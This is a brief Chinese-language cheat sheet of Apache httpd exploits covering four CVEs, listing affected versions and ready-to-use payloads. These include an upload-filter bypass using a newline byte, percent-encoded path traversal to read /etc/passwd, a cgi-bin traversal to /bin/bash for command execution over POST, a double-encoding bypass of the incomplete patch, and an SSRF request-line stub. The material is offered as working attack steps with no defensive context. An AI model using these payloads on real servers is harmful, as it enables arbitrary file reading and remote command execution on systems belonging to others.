CVE-2017-15715:
2.4.0~2.4.29
00截断,后缀名后面加0A,1.php后面加上一个空格,然后双击空格,右边出现hex进制,然后改成0A
CVE-2021-41773:
目录穿越,Apache httpd Server 2.4.49 版本引入了一个具有路径穿越漏洞的新函数,但需要配合穿越的目录,配置 Require all granted,攻击者可利用该漏洞实现路径穿越从而读取任意文件,或者在配置了cgi的httpd程序中执行bash指令,从而有机会控制服务器。
文件读取 payload
/icons/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
命令执行 payload
/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash
在命令执行时需要将GET方法转换成POST方法,并将命令放在请求体进行传递(在服务端开启了cgi或cgid这两个mod的情况下)
CVE-2021-42013:
Apache官方在2.4.50版本中对2.4.49版本中出现的目录穿越漏洞CVE-2021-41773进行了修复,但这个修复是不完整的
使用.%%32%65绕过
CVE-2021-40438
Apache v2.4.48及以下版本
GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA